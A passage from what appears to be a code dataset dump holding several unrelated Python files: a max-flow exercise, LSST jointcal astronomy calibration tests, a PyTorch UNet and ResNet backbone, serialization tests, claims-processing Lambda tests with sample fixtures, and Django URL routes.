BlueAndGreen(T, K, D):\n n = len(T)\n\n d = floyd_warshall(T)\n for i in range(n):\n for j in range(n):\n if d[i][j] < D and T[i][j] > 0:\n T[i][j] = T[j][i] = 0\n elif d[i][j] >= D and T[i][j] == 0:\n T[i][j] = T[j][i] = 1\n\n G = [[0 for _ in range(n+2)]for __ in range(n+2)]\n for i in range(n):\n for j in range(n):\n G[i][j] = n*T[i][j]\n\n source = n\n sink = n+1\n for i in range(n):\n if K[i] == 'B':\n G[source][i] = G[i][source] = 1\n else:\n G[sink][i] = G[i][sink] = 1\n\n result = edmonds_karp(G, source, sink)\n\n return result\n\nruntests( BlueAndGreen )","repo_name":"krzychsol/Algorithms-and-Data-Structures","sub_path":"Colloquiums/K3_2021/zad3.py","file_name":"zad3.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"778145257","text":"import unittest\nimport os\nimport tempfile\n\nimport lsst.geom\nimport lsst.utils\nimport lsst.pex.exceptions\nimport lsst.pex.config\n\nimport jointcalTestBase\n\n\n# for MemoryTestCase\ndef setup_module(module):\n lsst.utils.tests.init()\n\n\nclass JointcalTestCFHT(jointcalTestBase.JointcalTestBase, lsst.utils.tests.TestCase):\n\n @classmethod\n def setUpClass(cls):\n try:\n cls.data_dir = lsst.utils.getPackageDir('testdata_jointcal')\n except LookupError:\n raise unittest.SkipTest(\"testdata_jointcal not setup\")\n try:\n lsst.utils.getPackageDir('obs_cfht')\n except LookupError:\n raise unittest.SkipTest(\"obs_cfht not setup\")\n\n def setUp(self):\n input_dir = os.path.join(self.data_dir, 'cfht')\n all_visits = [849375, 850587]\n\n where = \"instrument='MegaPrime' and tract=0 and skymap='discrete'\"\n inputCollections = [\"singleFrame\", \"skymaps\"]\n refcats = {\"gaia_dr2_20200414\": os.path.join(input_dir, \"gaia_dr2_20200414.ecsv\"),\n \"ps1_pv3_3pi_20170110\": os.path.join(input_dir, \"ps1_pv3_3pi_20170110.ecsv\"),\n \"sdss_dr9_fink_v5b\": os.path.join(input_dir, \"sdss-dr9-fink-v5b.ecsv\")}\n\n outputDataId = {'instrument': 'MegaPrime', 'tract': 0, 'skymap': 'discrete'}\n self.setUp_base(\"lsst.obs.cfht.MegaPrime\", \"MegaPrime\",\n input_dir=input_dir,\n all_visits=all_visits,\n where=where,\n inputCollections=inputCollections,\n refcats=refcats,\n refcatPath=input_dir,\n outputDataId=outputDataId,\n log_level=\"DEBUG\")\n\n # The CFHT tests all produce the same set of output visits+detectors,\n # whether astrometry or photometry.\n self.outputVisits = {849375: (12, 13, 14, 21, 22, 23),\n 850587: (12, 13, 14, 21, 22, 23)}\n\n def test_jointcalTask_2_visits_simple(self):\n \"\"\"Test the simple models with two visits and check that some debug\n output files also get created.\n \"\"\"\n configOptions = {\"astrometryModel\": \"simple\", \"photometryModel\": \"simpleFlux\",\n \"writeInitialModel\": True, \"writeChi2FilesInitialFinal\": True}\n\n # use a temporary directory for debug output, to prevent test collisions\n with tempfile.TemporaryDirectory() as tempdir:\n configOptions[\"debugOutputPath\"] = tempdir\n metrics = {'astrometry_collected_refStars': 867,\n 'photometry_collected_refStars': 11569,\n 'astrometry_prepared_refStars': 323,\n 'photometry_prepared_refStars': 2302,\n 'astrometry_matched_fittedStars': 2399,\n 'photometry_matched_fittedStars': 2399,\n 'astrometry_prepared_fittedStars': 1255,\n 'photometry_prepared_fittedStars': 2317,\n 'astrometry_prepared_ccdImages': 12,\n 'photometry_prepared_ccdImages': 12,\n 'astrometry_final_chi2': 1568.76,\n 'astrometry_final_ndof': 2356,\n 'photometry_final_chi2': 11561.1,\n 'photometry_final_ndof': 2849\n }\n self._runJointcalTest(configOptions=configOptions, metrics=metrics,\n astrometryOutputs=self.outputVisits, photometryOutputs=self.outputVisits)\n\n # Check for the existence of the chi2 contribution files.\n expected = ['photometry_initial_chi2-0_r.MP9601', 'astrometry_initial_chi2-0_r.MP9601',\n 'photometry_final_chi2-0_r.MP9601', 'astrometry_final_chi2-0_r.MP9601']\n for partial in expected:\n name = os.path.join(tempdir, partial+'-ref.csv')\n self.assertTrue(os.path.exists(name), msg=\"Did not find file %s\"%name)\n name = os.path.join(tempdir, partial+'-meas.csv')\n self.assertTrue(os.path.exists(name), msg='Did not find file %s'%name)\n\n expected = [\"initial_astrometry_model-0_r.MP9601.txt\", \"initial_photometry_model-0_r.MP9601.txt\"]\n for name in expected:\n fullpath = os.path.join(tempdir, name)\n self.assertTrue(os.path.exists(fullpath), msg=f\"Did not find file {fullpath}\")\n\n def setup_jointcalTask_2_visits_constrainedAstrometry(self):\n \"\"\"Set default values for the constrainedAstrometry tests, and make\n the differences between each test and the defaults more obvious.\n \"\"\"\n configOptions = {\"astrometryModel\": \"constrained\", \"doPhotometry\": False}\n metrics = {'astrometry_collected_refStars': 867,\n 'astrometry_prepared_refStars': 323,\n 'astrometry_matched_fittedStars': 2399,\n 'astrometry_prepared_fittedStars': 1255,\n 'astrometry_prepared_ccdImages': 12,\n 'astrometry_final_chi2': 1611.57,\n 'astrometry_final_ndof': 2428,\n }\n return configOptions, metrics\n\n def test_jointcalTask_2_visits_constrainedAstrometry_no_photometry(self):\n configOptions, metrics = self.setup_jointcalTask_2_visits_constrainedAstrometry()\n configOptions['writeInitialModel'] = True # write the initial models\n # use a temporary directory for debug output, to prevent test collisions\n with tempfile.TemporaryDirectory() as tempdir:\n configOptions['debugOutputPath'] = tempdir\n\n self._runJointcalTest(configOptions=configOptions, metrics=metrics,\n astrometryOutputs=self.outputVisits)\n\n filename = os.path.join(tempdir, \"initial_astrometry_model-0_r.MP9601.txt\")\n self.assertTrue(os.path.exists(filename), msg=f\"Did not find file {filename}\")\n\n def test_jointcalTask_2_visits_constrainedAstrometry_no_rank_update(self):\n \"\"\"Demonstrate that skipping the rank update doesn't substantially affect astrometry.\n \"\"\"\n configOptions, metrics = self.setup_jointcalTask_2_visits_constrainedAstrometry()\n metrics['astrometry_final_chi2'] = 1611.57\n metrics['astrometry_final_ndof'] = 2318\n\n configOptions['astrometryDoRankUpdate'] = False\n\n self._runJointcalTest(configOptions=configOptions, metrics=metrics,\n astrometryOutputs=self.outputVisits)\n\n def test_jointcalTask_2_visits_constrainedAstrometry_4sigma_outliers(self):\n \"\"\"4 sigma outlier rejection means fewer available sources after the\n fitter converges, resulting in a smaller ndof and chi2.\n \"\"\"\n configOptions, metrics = self.setup_jointcalTask_2_visits_constrainedAstrometry()\n configOptions['outlierRejectSigma'] = 4\n metrics['astrometry_final_chi2'] = 1173.75\n metrics['astrometry_final_ndof'] = 2254\n\n self._runJointcalTest(configOptions=configOptions, metrics=metrics,\n astrometryOutputs=self.outputVisits)\n\n def test_jointcalTask_2_visits_constrainedAstrometry_astrometryOutlierRelativeTolerance(self):\n \"\"\"Test that astrometryOutlierRelativeTolerance changes the fit. Setting\n 1% for the astrometryOutlierRelativeTolerance will result in higher chi2\n and ndof.\n \"\"\"\n configOptions, metrics = self.setup_jointcalTask_2_visits_constrainedAstrometry()\n configOptions['astrometryOutlierRelativeTolerance'] = 0.01\n metrics['astrometry_final_chi2'] = 2229.21\n metrics['astrometry_final_ndof'] = 2552\n\n self._runJointcalTest(configOptions=configOptions, metrics=metrics,\n astrometryOutputs=self.outputVisits)\n\n def test_jointcalTask_2_visits_constrainedAstrometry_astrometryReferenceUncertainty_smaller(self):\n \"\"\"Test with a smaller fake reference uncertainty: chi2 will be higher.\"\"\"\n configOptions, metrics = self.setup_jointcalTask_2_visits_constrainedAstrometry()\n astrometryRefErrConfig = os.path.join(self.path, 'config/astrometryReferenceErr-config.py')\n metrics['astrometry_final_chi2'] = 1479.02\n metrics['astrometry_final_ndof'] = 2524\n\n self._runJointcalTest(configFiles=[astrometryRefErrConfig],\n configOptions=configOptions, metrics=metrics,\n astrometryOutputs=self.outputVisits)\n\n def test_jointcalTask_2_visits_constrainedAstrometry_astrometryReferenceUncertainty_None_fails(self):\n \"\"\"Setting astrometryReferenceUncertainty=None should fail for refcats\n that have no position errors.\n \"\"\"\n configOptions, metrics = self.setup_jointcalTask_2_visits_constrainedAstrometry()\n badRefErrConfig = os.path.join(self.path, 'config/astrometryReferenceErr-None-config.py')\n with self.assertRaisesRegex(lsst.pex.config.FieldValidationError,\n \"Reference catalog does not contain coordinate errors\"):\n self._runJointcalTest(configFiles=[badRefErrConfig], configOptions=configOptions, metrics=metrics)\n\n def setup_jointcalTask_2_visits_constrainedPhotometry(self):\n \"\"\"Set default values for the constrainedPhotometry tests, and make\n the differences between each test and the defaults more obvious.\n \"\"\"\n configOptions = {\"photometryModel\": \"constrainedFlux\", \"doAstrometry\": False}\n\n metrics = {'photometry_collected_refStars': 11569,\n 'photometry_prepared_refStars': 2302,\n 'photometry_matched_fittedStars': 2399,\n 'photometry_prepared_fittedStars': 2317,\n 'photometry_prepared_ccdImages': 12,\n 'photometry_final_chi2': 11264.28,\n 'photometry_final_ndof': 2821\n }\n return configOptions, metrics\n\n def test_jointcalTask_2_visits_constrainedPhotometry_no_astrometry(self):\n configOptions, metrics = self.setup_jointcalTask_2_visits_constrainedPhotometry()\n configOptions['writeInitialModel'] = True # write the initial models\n # use a temporary directory for debug output, to prevent test collisions\n with tempfile.TemporaryDirectory() as tempdir:\n configOptions['debugOutputPath'] = tempdir\n\n self._runJointcalTest(configOptions=configOptions, metrics=metrics,\n photometryOutputs=self.outputVisits)\n filename = os.path.join(tempdir, \"initial_photometry_model-0_r.MP9601.txt\")\n self.assertTrue(os.path.exists(filename), msg=f\"Did not find file {filename}\")\n\n def test_jointcalTask_2_visits_constrainedPhotometry_no_rank_update(self):\n \"\"\"Demonstrate that skipping the rank update doesn't substantially affect photometry.\n \"\"\"\n configOptions, metrics = self.setup_jointcalTask_2_visits_constrainedPhotometry()\n configOptions['photometryDoRankUpdate'] = False\n\n # The constrainedPhotometry model is not purely linear, so a small\n # change in final chi2 is possible.\n metrics['photometry_final_chi2'] = 10896.76\n metrics['photometry_final_ndof'] = 2787\n\n self._runJointcalTest(configOptions=configOptions, metrics=metrics,\n photometryOutputs=self.outputVisits)\n\n def test_jointcalTask_2_visits_constrainedPhotometry_lineSearch(self):\n \"\"\"Activating the line search should only slightly change the chi2.\n\n Activating line search for constrainedPhotometry should result in\n nearly the same final fit (the system is somewhat non-linear, so it\n may not be exactly the same: check the \"Line search scale factor\"\n lines in the DEBUG log for values that are not ~1 for proof).\n \"\"\"\n configOptions, metrics = self.setup_jointcalTask_2_visits_constrainedPhotometry()\n configOptions['allowLineSearch'] = True\n\n metrics['photometry_final_chi2'] = 10000.87\n metrics['photometry_final_ndof'] = 2773\n\n self._runJointcalTest(configOptions=configOptions, metrics=metrics,\n photometryOutputs=self.outputVisits)\n\n def test_jointcalTask_2_visits_constrainedMagnitude_no_astrometry(self):\n configOptions, metrics = self.setup_jointcalTask_2_visits_constrainedPhotometry()\n configOptions['photometryModel'] = \"constrainedMagnitude\"\n\n # The resulting fit should be close to the constrainedFlux model:\n # there are few CCDs and 2 visits, so there's not a lot of complexity\n # in this case to distinguish the flux vs. magnitude models.\n metrics['photometry_final_chi2'] = 10276.57\n metrics['photometry_final_ndof'] = 2823\n\n self._runJointcalTest(configOptions=configOptions, metrics=metrics,\n photometryOutputs=self.outputVisits)\n\n def test_jointcalTask_2_visits_constrainedFlux_pedestal(self):\n \"\"\"Test that forcing a systematic flux error results in a lower chi2.\n \"\"\"\n configOptions, metrics = self.setup_jointcalTask_2_visits_constrainedPhotometry()\n # median fluxErr/flux in ps1 is 0.11, so we have to make this bigger\n # than that to actually allow more slop in the fit.\n configOptions['photometryErrorPedestal'] = 0.2\n\n # Final chi2 is much lower, because all sources contribute more error.\n metrics['photometry_final_chi2'] = 3355.96\n # ndof may change; slightly different likelihood contours, and fewer\n # reference sources rejected.\n metrics['photometry_final_ndof'] = 3262\n\n self._runJointcalTest(configOptions=configOptions, metrics=metrics,\n photometryOutputs=self.outputVisits)\n\n def test_jointcalTask_2_visits_constrainedMagnitude_pedestal(self):\n \"\"\"Test that forcing a systematic flux error results in a lower chi2.\n \"\"\"\n configOptions, metrics = self.setup_jointcalTask_2_visits_constrainedPhotometry()\n configOptions['photometryModel'] = \"constrainedMagnitude\"\n # median fluxErr/flux in ps1 is 0.11, so we have to make this bigger\n # than that to actually allow more slop in the fit.\n configOptions['photometryErrorPedestal'] = 0.2\n\n # Final chi2 is much lower, because all sources contribute more error.\n metrics['photometry_final_chi2'] = 3165.87\n # ndof may change; slightly different likelihood contours, and fewer\n # reference sources rejected.\n metrics['photometry_final_ndof'] = 3224\n\n self._runJointcalTest(configOptions=configOptions, metrics=metrics,\n photometryOutputs=self.outputVisits)\n\n\nclass MemoryTester(lsst.utils.tests.MemoryTestCase):\n pass\n\n\nif __name__ == \"__main__\":\n lsst.utils.tests.init()\n unittest.main()\n","repo_name":"lsst/jointcal","sub_path":"tests/test_jointcal_cfht.py","file_name":"test_jointcal_cfht.py","file_ext":"py","file_size_in_byte":15028,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"72166762027","text":"import torch\nimport torch.nn as nn\nimport numpy as np\nfrom torch import Tensor\n\nclass UNet(nn.Module):\n def __init__(self, \n encoders,\n decoders,\n bottlenecks=None,\n res_paths = None,\n device=\"cuda:0\"\n ):\n super().__init__()\n\n self.device = device\n\n ## Exception Check\n if len(encoders) != len(decoders) :\n raise Exception(\"ERROR::unmatched legnth : enc {} != dec {}\".format(len(encoders),len(decoders)))\n else :\n self.len_model = len(encoders)\n\n self.print_shape = print_shape\n\n self.encoders = encoders\n self.decoders = decoders\n for i in range(len(encoders)) : \n module = self.encoders[i]\n self.add_module(\"encoder_{}\".format(i),module)\n for i in range(len(decoders)) : \n module = self.decoders[i]\n self.add_module(\"decoder_{}\".format(i),module)\n\n # Residual Path\n self.res_paths = []\n if res_paths is not None :\n if (len(res_paths) != self.len_model -1) :\n raise Exception(\"ERROR::unmatched res_path : {} != {}\".format(len(res_paths),self.len_model-1))\n else :\n for i in range(len(res_paths)):\n module = res_paths[i]\n self.add_module(\"res_path{}\".format(i),module)\n self.res_paths.append(module)\n # default : skip connection\n else :\n for i in range(self.len_model-1):\n module = nn.Identity()\n self.add_module(\"res_path{}\".format(i),module)\n self.res_paths.append(module)\n # Dummy\n module = nn.Identity()\n self.add_module(\"res_path{}\".format(i+1),module)\n self.res_paths.append(module)\n \n ## Bottlenect\n self.bottlenecks = []\n if bottlenecks is not None :\n for i in range(len(bottlenecks)):\n module = bottlenecks[i]\n self.add_module(\"bottleneck{}\".format(i),module)\n self.bottlenecks.append(module)\n else :\n module = nn.Identity()\n self.add_module(\"bottleneck{}\".format(0),module)\n self.bottlenecks.append(module)\n\n bottleneck_channel = encoders[-1].conv.out_channels\n \n linear = nn.Conv2d(1, 1, 1)\n self.add_module(\"linear\", linear)\n self.activation_mask = nn.Sigmoid()\n \n def forward(self, x): \n # ipnut : [ Batch Channel Freq Time]\n\n # Time must be multiple of 16\n \"\"\"\n len_orig = x.shape[-1]\n need = int(16*np.floor(len_orig/16)+16) - len_orig\n x = torch.nn.functional.pad(x,(0,need))\n \"\"\"\n\n # Encoder \n x_skip = []\n for i, encoder in enumerate(self.encoders):\n x_skip.append(self.res_paths[i](x))\n x = encoder(x)\n if self.print_shape : \n print(\"Encoder {} : {}\".format(i,x.shape))\n\n p = x\n for i, bottleneck in enumerate(self.bottlenecks):\n p = bottleneck(p)\n if self.print_shape : \n print(\"bottleneck {} : {}\".format(i,p.shape))\n \n # Decoders\n for i, decoder in enumerate(self.decoders):\n p = decoder(p)\n if self.print_shape : \n print(\"Decoder {} : {}\".format(i,p.shape))\n # last layer of Decorders\n if i == self.len_model- 1:\n break\n p = torch.cat([p, x_skip[self.len_model - 1 - i]], dim=1)\n if self.print_shape : \n print(\"Decoder cat {} : {}\".format(i,p.shape))\n\n mask = self.linear(p)\n mask = self.activation_mask(mask)\n \n return mask\n\n","repo_name":"kooBH/UNet","sub_path":"UNet.py","file_name":"UNet.py","file_ext":"py","file_size_in_byte":3825,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"70649647467","text":"\r\nfrom humpack import pack, unpack, json_unpack, json_pack\r\nfrom _util_test import get_adict\r\n\r\n\r\ndef test_pack_tdict():\r\n\tdata = get_adict()\r\n\trec = unpack(pack(data))\r\n\t\r\n\tassert repr(data) == repr(rec)\r\n\r\n\r\ndef test_json_pack_transactionable():\r\n\tdata = get_adict()\r\n\t\r\n\ts = json_pack(data)\r\n\tassert repr(json_unpack(s)) == repr(data)\r\n\t\r\n\tdata.begin()\r\n\t\r\n\tdata[1234] = 'element'\r\n\tassert 1234 in data\r\n\tassert 'element' == data[1234]\r\n\t\r\n\tdata.abc = 123\r\n\tassert 'abc' in data\r\n\tassert data.abc == 123\r\n\tassert data['abc'] == 123\r\n\t\r\n\tdata.abort()\r\n\t\r\n\tassert repr(json_unpack(s)) == repr(data)\r\n\t\r\n\t","repo_name":"felixludos/HumPack","sub_path":"tests/test_packing.py","file_name":"test_packing.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"11746539491","text":"from datetime import date\nimport json\nfrom app.claim import claim_lambda\nfrom test.claims import ClaimTestCase\nfrom app.claim.claims import service\nfrom app.provider.provider import ProviderType\nfrom app.profile.profile import Gender\nfrom test.claims.providers.test_lambdas import provider_test_case\nfrom test.claims.profiles.test_lambdas import profile_test_case\n\n\nclass claimclaimTestCase(ClaimTestCase):\n\n def _retrieve_response_id(self, response):\n dict = json.loads(response['body'])\n return dict['id']\n\n def _insert_claim(self):\n billing_response = provider_test_case.create_provider(name=\"Gentem\", address=\"303 YOUNGLOVE AVE, san francisco 94103, CA\",\n npi=\"1568412345\", type=ProviderType.BILLING_PROVIDER.value, phone=\"424-248-7725\")\n billing_provider_id = self._retrieve_response_id(billing_response)\n\n referring_response = provider_test_case.create_provider(name=\"John Lin\", npi=\"1568412346\", type=ProviderType.REFERRING_PROVIDER.value)\n referring_provider_id = self._retrieve_response_id(referring_response)\n\n rendering_response = provider_test_case.create_provider(name=\"Saint Francis Memorial Hospital\", address=\"2900 Hyde St Lower Nob Hill, san francisco 94103, CA\", npi=\"1316061997\", type=ProviderType.RENDERING_PROVIDER.value)\n rendering_provider_id = self._retrieve_response_id(rendering_response)\n\n insured_response = profile_test_case.create_profile(email=\"jon.doe@gmail.com\", last_name=\"Doe\", gender=Gender.MALE.value, first_name=\"Jon\",\n address=\"1 glove drive , san francisco 94103, CA\", member_id=\"ABC100286987\", phone=\"415 1234567\",middle_initial=\"P\", dob=date(1981, 6, 24))\n insured_id = self._retrieve_response_id(insured_response)\n patient_response = profile_test_case.create_profile(email=\"susan.doe@gmail.com\", last_name=\"Doe\", gender=Gender.FEMALE.value, first_name=\"Susan\",\n address=\"1 glove drive , san francisco 94103, CA\", member_id=\"ABC100286987\", phone=\"415 1234567\", dob=date(2015, 10, 19))\n patient_id = self._retrieve_response_id(patient_response)\n\n claim_json = self._create_claim_json(patient_id, referring_provider_id, billing_provider_id, rendering_provider_id, insured_id)\n event = dict(body=claim_json, httpMethod='POST')\n response = claim_lambda.post_claim(event, None)\n return response, patient_id, billing_provider_id, referring_provider_id, rendering_provider_id, insured_id\n\n def _delete_claim(self, claim_id, patient_id, billing_provider_id, referring_provider_id, rendering_provider_id, insured_id):\n event = dict(httpMethod='DELETE', pathParameters={'id': claim_id})\n deleted_response = claim_lambda.delete_claim(event, None)\n self.assertIsNotNone(deleted_response['body'])\n self.assertEqual(deleted_response['statusCode'], 200)\n\n profile_test_case.delete_profile(patient_id)\n profile_test_case.delete_profile(insured_id)\n provider_test_case.delete_provider(billing_provider_id)\n provider_test_case.delete_provider(referring_provider_id)\n provider_test_case.delete_provider(rendering_provider_id)\n\n def test_post(self):\n response, patient_id, billing_provider_id, referring_provider_id, rendering_provider_id, insured_id = self._insert_claim()\n\n self.assertIsNotNone(response['body'])\n self.assertEqual(response['statusCode'], 201)\n claim_dict = json.loads(response['body'])\n self._delete_claim(claim_dict['id'], patient_id, billing_provider_id, referring_provider_id, rendering_provider_id, insured_id)\n\n def test_get(self):\n create_response, patient_id, billing_provider_id, referring_provider_id, rendering_provider_id, insured_id = self._insert_claim()\n\n # Get id\n claim_dict = json.loads(create_response['body'])\n event = dict(httpMethod='GET', pathParameters={'id': claim_dict['id']})\n retrieved_claim = claim_lambda.get_claim(event, None)\n self.assertIsNotNone(retrieved_claim)\n\n self._delete_claim(claim_dict['id'], patient_id, billing_provider_id, referring_provider_id, rendering_provider_id, insured_id)\n\n def test_list(self):\n response, patient_id, billing_provider_id, referring_provider_id, rendering_provider_id, insured_id = self._insert_claim()\n\n # List\n event = dict(httpMethod='GET')\n page_string = claim_lambda.list_claim(event, None)\n self.assertIsNotNone(page_string)\n\n claim_dict = json.loads(response['body'])\n self._delete_claim(claim_dict['id'], patient_id, billing_provider_id, referring_provider_id, rendering_provider_id, insured_id)","repo_name":"nicoglp/aws-customers","sub_path":"test/claims/test_lambdas.py","file_name":"test_lambdas.py","file_ext":"py","file_size_in_byte":4802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12371986075","text":"from django.urls import path\nfrom django.conf.urls import include\nfrom rest_framework import routers\nfrom api.views import TaskViewSets, CreateUserView, TaskListView, TaskRetriveView, PostListView, PostRetriveView\n\n\nrouter = routers.DefaultRouter()\nrouter.register(\"tasks\", TaskViewSets, basename=\"tasks\")\n\nurlpatterns = [\n path(\"list-post/\", PostListView.as_view(), name=\"list-post\"),\n path(\"detail-post//\", PostRetriveView.as_view(), name=\"detail-post\"),\n path(\"list-task/\", TaskListView.as_view(), name=\"list-task\"),\n path(\"detail-task//\", TaskRetriveView.as_view(), name=\"detail-task\"),\n path(\"register/\", CreateUserView.as_view(), name=\"register\"),\n path(\"auth/\", include(\"djoser.urls.jwt\")),\n path(\"\", include(router.urls)),\n]\n","repo_name":"HDYS-TTBYS/nextjs_blog_todo_api","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19627572436","text":"\"\"\"resnet in pytorch\n[1] Kaiming He, Xiangyu Zhang, Shaoqing Ren, Jian Sun.\n Deep Residual Learning for Image Recognition\n https://arxiv.org/abs/1512.03385v1\n\"\"\"\n\nimport warnings\n\nimport torch\nimport torch.nn as nn\nimport torch.utils.checkpoint as cp\n\nfrom mmcv.runner import BaseModule\n\nfrom mmseg.models.builder import DEPTHBACKBONE\n\nconv_cfg = {\n 'Conv': nn.Conv2d,\n}\n\n\ndef build_conv_layer(cfg, *args, **kwargs):\n \"\"\"Build convolution layer.\n Args:\n cfg (None or dict): Cfg should contain:\n type (str): Identify conv layer type.\n layer args: Args needed to instantiate a conv layer.\n Returns:\n nn.Module: Created conv layer.\n \"\"\"\n\n cfg_ = dict(type='Conv')\n \n\n layer_type = cfg_.pop('type')\n if layer_type not in conv_cfg:\n raise KeyError('Unrecognized norm type {}'.format(layer_type))\n else:\n conv_layer = conv_cfg[layer_type]\n\n layer = conv_layer(*args, **kwargs, **cfg_)\n\n return layer\n\nnorm_cfg = {\n # format: layer_type: (abbreviation, module)\n 'BN': ('bn', nn.BatchNorm2d),\n 'SyncBN': ('bn', nn.SyncBatchNorm),\n 'GN': ('gn', nn.GroupNorm),\n # and potentially 'SN'\n}\n\n\ndef build_norm_layer(cfg, num_features, postfix=''):\n \"\"\"Build normalization layer.\n Args:\n cfg (dict): cfg should contain:\n type (str): identify norm layer type.\n layer args: args needed to instantiate a norm layer.\n requires_grad (bool): [optional] whether stop gradient updates\n num_features (int): number of channels from input.\n postfix (int, str): appended into norm abbreviation to\n create named layer.\n Returns:\n name (str): abbreviation + postfix\n layer (nn.Module): created norm layer\n \"\"\"\n assert isinstance(cfg, dict) and 'type' in cfg\n cfg_ = cfg.copy()\n\n layer_type = cfg_.pop('type')\n if layer_type not in norm_cfg:\n raise KeyError('Unrecognized norm type {}'.format(layer_type))\n else:\n abbr, norm_layer = norm_cfg[layer_type]\n if norm_layer is None:\n raise NotImplementedError\n\n assert isinstance(postfix, (int, str))\n name = abbr + str(postfix)\n\n requires_grad = cfg_.pop('requires_grad', True)\n cfg_.setdefault('eps', 1e-5)\n if layer_type != 'GN':\n layer = norm_layer(num_features, **cfg_)\n if layer_type == 'SyncBN':\n layer._specify_ddp_gpu_num(1)\n else:\n assert 'num_groups' in cfg_\n layer = norm_layer(num_channels=num_features, **cfg_)\n\n for param in layer.parameters():\n param.requires_grad = requires_grad\n\n return name, layer\n\n\nclass BasicBlock(BaseModule):\n expansion = 1\n\n def __init__(self,\n inplanes,\n planes,\n stride=1,\n dilation=1,\n downsample=None,\n style='pytorch',\n with_cp=False,\n conv_cfg=None,\n norm_cfg=dict(type='BN')):\n super(BasicBlock, self).__init__()\n\n self.norm1_name, norm1 = build_norm_layer(norm_cfg, planes, postfix=1)\n self.norm2_name, norm2 = build_norm_layer(norm_cfg, planes, postfix=2)\n\n self.conv1 = build_conv_layer(\n conv_cfg,\n inplanes,\n planes,\n 3,\n stride=stride,\n padding=dilation,\n dilation=dilation,\n bias=False)\n self.add_module(self.norm1_name, norm1)\n self.conv2 = build_conv_layer(\n conv_cfg, planes, planes, 3, padding=1, bias=False)\n self.add_module(self.norm2_name, norm2)\n\n self.relu = nn.ReLU(inplace=True)\n self.downsample = downsample\n self.stride = stride\n self.dilation = dilation\n assert not with_cp\n\n @property\n def norm1(self):\n return getattr(self, self.norm1_name)\n\n @property\n def norm2(self):\n return getattr(self, self.norm2_name)\n\n def forward(self, x):\n identity = x\n\n out = self.conv1(x)\n out = self.norm1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.norm2(out)\n\n if self.downsample is not None:\n identity = self.downsample(x)\n\n out += identity\n out = self.relu(out)\n\n return out\n\n\nclass Bottleneck(BaseModule):\n expansion = 4\n\n def __init__(self,\n inplanes,\n planes,\n stride=1,\n dilation=1,\n downsample=None,\n style='pytorch',\n with_cp=False,\n conv_cfg=None,\n norm_cfg=dict(type='BN')):\n \"\"\"Bottleneck block for ResNet.\n If style is \"pytorch\", the stride-two layer is the 3x3 conv layer,\n if it is \"caffe\", the stride-two layer is the first 1x1 conv layer.\n \"\"\"\n super(Bottleneck, self).__init__()\n assert style in ['pytorch', 'caffe']\n\n self.inplanes = inplanes\n self.planes = planes\n self.stride = stride\n self.dilation = dilation\n self.style = style\n self.with_cp = with_cp\n self.conv_cfg = conv_cfg\n self.norm_cfg = norm_cfg\n\n if self.style == 'pytorch':\n self.conv1_stride = 1\n self.conv2_stride = stride\n else:\n self.conv1_stride = stride\n self.conv2_stride = 1\n\n self.norm1_name, norm1 = build_norm_layer(norm_cfg, planes, postfix=1)\n self.norm2_name, norm2 = build_norm_layer(norm_cfg, planes, postfix=2)\n self.norm3_name, norm3 = build_norm_layer(\n norm_cfg, planes * self.expansion, postfix=3)\n\n self.conv1 = build_conv_layer(\n conv_cfg,\n inplanes,\n planes,\n kernel_size=1,\n stride=self.conv1_stride,\n bias=False)\n self.add_module(self.norm1_name, norm1)\n self.conv2 = build_conv_layer(\n conv_cfg,\n planes,\n planes,\n kernel_size=3,\n stride=self.conv2_stride,\n padding=dilation,\n dilation=dilation,\n bias=False)\n self.add_module(self.norm2_name, norm2)\n self.conv3 = build_conv_layer(\n conv_cfg,\n planes,\n planes * self.expansion,\n kernel_size=1,\n bias=False)\n self.add_module(self.norm3_name, norm3)\n\n self.relu = nn.ReLU(inplace=True)\n self.downsample = downsample\n\n @property\n def norm1(self):\n return getattr(self, self.norm1_name)\n\n @property\n def norm2(self):\n return getattr(self, self.norm2_name)\n\n @property\n def norm3(self):\n return getattr(self, self.norm3_name)\n\n def forward(self, x):\n\n def _inner_forward(x):\n identity = x\n\n out = self.conv1(x)\n out = self.norm1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.norm2(out)\n out = self.relu(out)\n\n out = self.conv3(out)\n out = self.norm3(out)\n\n if self.downsample is not None:\n identity = self.downsample(x)\n\n out += identity\n\n return out\n\n if self.with_cp and x.requires_grad:\n out = cp.checkpoint(_inner_forward, x)\n else:\n out = _inner_forward(x)\n\n out = self.relu(out)\n\n return out\n\n\ndef make_res_layer(block,\n inplanes,\n planes,\n blocks,\n stride=1,\n dilation=1,\n style='pytorch',\n with_cp=False,\n conv_cfg=None,\n norm_cfg=dict(type='BN')):\n downsample = None\n if stride != 1 or inplanes != planes * block.expansion:\n downsample = nn.Sequential(\n build_conv_layer(\n conv_cfg,\n inplanes,\n planes * block.expansion,\n kernel_size=1,\n stride=stride,\n bias=False),\n build_norm_layer(norm_cfg, planes * block.expansion)[1],\n )\n\n layers = []\n layers.append(\n block(\n inplanes=inplanes,\n planes=planes,\n stride=stride,\n dilation=dilation,\n downsample=downsample,\n style=style,\n with_cp=with_cp,\n conv_cfg=conv_cfg,\n norm_cfg=norm_cfg))\n inplanes = planes * block.expansion\n for i in range(1, blocks):\n layers.append(\n block(\n inplanes=inplanes,\n planes=planes,\n stride=1,\n dilation=dilation,\n style=style,\n with_cp=with_cp,\n conv_cfg=conv_cfg,\n norm_cfg=norm_cfg))\n\n return nn.Sequential(*layers)\n\n@DEPTHBACKBONE.register_module()\nclass DepthResNet(BaseModule):\n \"\"\"ResNet backbone.\n Args:\n depth (int): Depth of resnet, from {18, 34, 50, 101, 152}.\n in_channels (int): Number of input image channels. Normally 3.\n num_stages (int): Resnet stages, normally 